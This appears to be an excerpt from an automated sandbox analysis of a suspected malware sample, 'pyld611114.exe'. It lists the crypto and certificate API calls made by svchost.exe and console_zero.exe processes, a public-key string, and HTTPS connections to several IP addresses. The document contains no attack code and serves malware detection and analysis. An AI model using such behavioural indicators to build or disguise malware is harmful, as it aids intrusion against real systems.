set_debug,ERR_set_error,BIO_test_flags,BIO_ADDR_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,42_2_00007FFDA3603C40
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3689C40 EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get_security_bits,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,EVP_PKEY_get_bn_param,EVP_PKEY_get_bn_param,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BN_num_bits,BN_num_bits,memset,BN_num_bits,BN_bn2bin,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,ERR_set_debug,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,ERR_set_debug,EVP_DigestSign,EVP_DigestSign,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,BN_free,BN_free,BN_free,BN_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA3689C40
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3601C50 CRYPTO_zalloc,42_2_00007FFDA3601C50
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3653C30 CRYPTO_zalloc,CRYPTO_free,CRYPTO_free,42_2_00007FFDA3653C30
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA361BC10 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,42_2_00007FFDA361BC10
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3601BE0 CRYPTO_zalloc,42_2_00007FFDA3601BE0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3607BEE CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA3607BEE
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA361DAA0 CRYPTO_zalloc,CRYPTO_THREAD_lock_new,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,OPENSSL_sk_dup,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_new,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_inherit,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_malloc,memcpy,CRYPTO_memdup,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error,42_2_00007FFDA361DAA0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA367BAA0 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_clear_free,CRYPTO_clear_free,42_2_00007FFDA367BAA0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3623A70 CRYPTO_get_ex_data,42_2_00007FFDA3623A70
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3613A70 CRYPTO_free,CRYPTO_free,CRYPTO_free_ex_data,OPENSSL_LH_free,X509_STORE_free,CTLOG_STORE_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OSSL_STACK_OF_X509_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_secure_free,EVP_MD_get0_provider,EVP_MD_free,EVP_MD_get0_provider,EVP_MD_free,EVP_CIPHER_get0_provider,EVP_CIPHER_free,EVP_MD_get0_provider,EVP_MD_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA3613A70
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3641A60 CRYPTO_free,42_2_00007FFDA3641A60
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3627B50 EVP_CIPHER_get_mode,EVP_CIPHER_get_mode,EVP_CIPHER_get_iv_length,ERR_new,ERR_set_debug,EVP_CIPHER_get_key_length,CRYPTO_malloc,ERR_new,ERR_set_debug,42_2_00007FFDA3627B50
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3679B4A memset,CRYPTO_zalloc,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,42_2_00007FFDA3679B4A
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3679B33 EVP_PKEY_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestVerifyInit_ex,ERR_new,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_DigestVerify,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,42_2_00007FFDA3679B33
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364BB00 CRYPTO_free,42_2_00007FFDA364BB00
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36379D0 CRYPTO_malloc,memcpy,BIO_snprintf,BIO_snprintf,CRYPTO_zalloc,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_new_file,BIO_free_all,CRYPTO_free,BIO_free_all,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA36379D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36799B3 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,42_2_00007FFDA36799B3
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36419A0 CRYPTO_malloc,42_2_00007FFDA36419A0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA367999C EVP_MD_CTX_new,ERR_new,ERR_set_debug,X509_get0_pubkey,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OSSL_STORE_INFO_get_type,OSSL_STORE_INFO_get_type,OSSL_STORE_INFO_get_type,EVP_MD_get0_name,EVP_DigestVerifyInit_ex,ERR_new,ERR_set_debug,OSSL_STORE_INFO_get_type,CRYPTO_malloc,BUF_reverse,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_MD_CTX_ctrl,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,BIO_free,EVP_MD_CTX_free,CRYPTO_free,42_2_00007FFDA367999C
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3679985 ERR_new,ERR_set_debug,EVP_PKEY_free,ERR_new,ERR_set_debug,OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,X509_free,OSSL_STACK_OF_X509_free,42_2_00007FFDA3679985
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360DA50 OPENSSL_sk_num,X509_STORE_CTX_new_ex,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,X509_STORE_CTX_init,ERR_new,ERR_set_debug,ERR_set_error,X509_STORE_CTX_free,ERR_new,ERR_set_debug,ERR_set_error,X509_STORE_CTX_free,X509_STORE_CTX_set_flags,CRYPTO_THREAD_run_once,X509_STORE_CTX_set_ex_data,OPENSSL_sk_num,X509_STORE_CTX_set0_dane,X509_STORE_CTX_set_default,X509_VERIFY_PARAM_set1,X509_STORE_CTX_set_verify_cb,X509_verify_cert,X509_STORE_CTX_get_error,OSSL_STACK_OF_X509_free,X509_STORE_CTX_get0_chain,X509_STORE_CTX_get1_chain,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_move_peername,X509_STORE_CTX_free,42_2_00007FFDA360DA50
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA365DA40 CRYPTO_memcmp,42_2_00007FFDA365DA40
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3609A20 EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_is_a,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_derive,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,42_2_00007FFDA3609A20
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA363B8D0 CRYPTO_free,CRYPTO_free,OSSL_ERR_STATE_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA363B8D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36378D0 BIO_free_all,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA36378D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36618D0 CRYPTO_free,42_2_00007FFDA36618D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36738C0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,42_2_00007FFDA36738C0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366B8C0 CRYPTO_free,42_2_00007FFDA366B8C0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366B870 CRYPTO_free,42_2_00007FFDA366B870
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA367985F memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,memcmp,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,memcmp,memcmp,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,42_2_00007FFDA367985F
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3607870 CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,CRYPTO_free,memset,CRYPTO_free,42_2_00007FFDA3607870
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3611950 CRYPTO_free,CRYPTO_strdup,42_2_00007FFDA3611950
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3667920 ERR_new,ERR_set_debug,CRYPTO_malloc,COMP_expand_block,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA3667920
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36518E9 CRYPTO_malloc,CRYPTO_free,42_2_00007FFDA36518E9
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364FFD0 CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA364FFD0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3635FA0 CRYPTO_realloc,42_2_00007FFDA3635FA0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA368BFA0 EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,ERR_new,ERR_set_debug,EVP_PKEY_derive_set_peer,ERR_clear_error,ASN1_item_d2i,ASN1_TYPE_get,ERR_new,ERR_set_debug,EVP_PKEY_decrypt,ERR_new,EVP_PKEY_CTX_ctrl,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,ASN1_item_free,42_2_00007FFDA368BFA0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3609F90 CRYPTO_malloc,memset,memcpy,memcpy,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,OPENSSL_cleanse,42_2_00007FFDA3609F90
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360DF70 CRYPTO_malloc,BIO_snprintf,42_2_00007FFDA360DF70
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA362A030 OSSL_PROVIDER_do_all,CRYPTO_free,CRYPTO_zalloc,OBJ_txt2nid,42_2_00007FFDA362A030
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3640010 CRYPTO_zalloc,CRYPTO_strdup,CRYPTO_free,42_2_00007FFDA3640010
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3642000 CRYPTO_free,42_2_00007FFDA3642000
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360BFF0 CRYPTO_THREAD_run_once,42_2_00007FFDA360BFF0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3667FE0 ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_CIPHER_get_flags,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_MD_get_size,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_mark,ERR_clear_last_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ERR_clear_last_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_CIPHER_CTX_get0_cipher,CRYPTO_memcmp,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,42_2_00007FFDA3667FE0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3601EC0 CRYPTO_free,42_2_00007FFDA3601EC0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3657EC0 CRYPTO_zalloc,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,42_2_00007FFDA3657EC0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA362DEA0 EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,CRYPTO_zalloc,EVP_MAC_CTX_free,EVP_MAC_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_free,EVP_CIPHER_CTX_new,EVP_CIPHER_fetch,OSSL_PARAM_construct_utf8_string,OSSL_PARAM_construct_end,EVP_DecryptInit_ex,EVP_CIPHER_free,EVP_CIPHER_free,EVP_CIPHER_free,EVP_MAC_CTX_get_mac_size,EVP_CIPHER_CTX_get_iv_length,EVP_MAC_final,CRYPTO_memcmp,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,memcpy,ERR_clear_error,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_CTX_free,CRYPTO_free,42_2_00007FFDA362DEA0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3667E90 CRYPTO_malloc,COMP_expand_block,42_2_00007FFDA3667E90
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3675E80 CRYPTO_free,CRYPTO_strndup,CRYPTO_free,OPENSSL_cleanse,memcpy,EVP_MD_get0_name,EVP_MD_is_a,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,42_2_00007FFDA3675E80
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3641E70 CRYPTO_realloc,42_2_00007FFDA3641E70
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3639E60 OPENSSL_LH_free,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free,42_2_00007FFDA3639E60
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3629F30 OSSL_PROVIDER_do_all,CRYPTO_malloc,memcpy,42_2_00007FFDA3629F30
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3671F30 CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA3671F30
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3623F00 CRYPTO_free,CRYPTO_strdup,42_2_00007FFDA3623F00
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA367BDB0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_is_a,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,RAND_bytes_ex,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_encrypt_init,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,42_2_00007FFDA367BDB0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3607DA0 CRYPTO_free,42_2_00007FFDA3607DA0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3605DB0 CRYPTO_malloc,42_2_00007FFDA3605DB0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3679DA6 CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,42_2_00007FFDA3679DA6
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3623D70 CRYPTO_zalloc,CRYPTO_new_ex_data,CRYPTO_free,42_2_00007FFDA3623D70
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364BD60 CRYPTO_zalloc,42_2_00007FFDA364BD60
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3623E50 CRYPTO_free,CRYPTO_memdup,42_2_00007FFDA3623E50
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3655E20 CRYPTO_zalloc,OSSL_ERR_STATE_new,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,42_2_00007FFDA3655E20
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360DE10 i2d_X509_NAME,memcmp,CRYPTO_free,CRYPTO_free,42_2_00007FFDA360DE10
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3653E10 CRYPTO_malloc,CRYPTO_free,42_2_00007FFDA3653E10
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3629E00 CRYPTO_zalloc,EVP_MAC_fetch,EVP_MAC_CTX_new,EVP_MAC_free,EVP_MAC_CTX_free,EVP_MAC_free,CRYPTO_free,42_2_00007FFDA3629E00
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366DDE0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,42_2_00007FFDA366DDE0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3629CC0 EVP_MAC_CTX_free,CRYPTO_free,42_2_00007FFDA3629CC0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3679CC1 EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_MD_CTX_copy_ex,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,42_2_00007FFDA3679CC1
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA363FCB0 CRYPTO_free,42_2_00007FFDA363FCB0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3679CAA ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,EVP_MD_fetch,ERR_new,ERR_new,ERR_set_debug,EVP_MD_free,EVP_MD_get_size,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_free,CRYPTO_free,42_2_00007FFDA3679CAA
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366FC90 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,memcmp,ERR_new,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,42_2_00007FFDA366FC90
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3671C70 CRYPTO_realloc,42_2_00007FFDA3671C70
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3655D30 CRYPTO_free,42_2_00007FFDA3655D30
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA378BA86 wcschr,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcschr,_wcsdup,CertOpenStore,GetLastError,free,free,free,free,CryptStringToBinaryW,free,CertFindCertificateInStore,free,calloc,CertFreeCertificateContext,CertCloseStore,free,fseek,ftell,fread,fclose,fseek,malloc,fclose,free,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strtol,strchr,strncmp,strncmp,strncmp,strchr,CertFreeCertificateContext,free,free,42_2_00007FFDA378BA86
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA375E3C0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,42_2_00007FFDA375E3C0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA376C300 BCryptGenRandom,42_2_00007FFDA376C300
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA378E270 memcmp,memcmp,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,42_2_00007FFDA378E270
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA375E3C0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,45_2_00007FFDA375E3C0
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA376C300 BCryptGenRandom,45_2_00007FFDA376C300
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA378E270 memcmp,memcmp,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,45_2_00007FFDA378E270
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA3741180 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,45_2_00007FFDA3741180
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA37731A0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,45_2_00007FFDA37731A0
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA3773110 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,45_2_00007FFDA3773110
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA3773090 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,45_2_00007FFDA3773090
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA378E7A0 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx,45_2_00007FFDA378E7A0
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA375E570 CryptHashData,45_2_00007FFDA375E570
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA375E580 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,45_2_00007FFDA375E580
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA378B4E0 memset,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,45_2_00007FFDA378B4E0
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA375E4F0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,45_2_00007FFDA375E4F0
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA376C4D0 memset,BCryptGenRandom,45_2_00007FFDA376C4D0
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA378BA86 wcschr,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcschr,CertOpenStore,GetLastError,free,free,CryptStringToBinaryW,free,CertFindCertificateInStore,free,CertFreeCertificateContext,CertCloseStore,free,fseek,ftell,fread,fclose,fseek,fclose,MultiByteToWideChar,PFXImportCertStore,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strtol,strchr,strncmp,strncmp,strncmp,strchr,CertFreeCertificateContext,free,45_2_00007FFDA378BA86
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA378DE50 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx,free,CertFreeCertificateContext,45_2_00007FFDA378DE50
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_963ed4cc-c
Source: C:\Windows\System32\console_zero.exeCode function: mov dword ptr [rbp+04h], 424D53FFh45_2_00007FFDA3774930
Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49814 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.6:49860 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.6:49872 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.6:49881 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.6:49886 version: TLS 1.2
Source: pyld611114.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
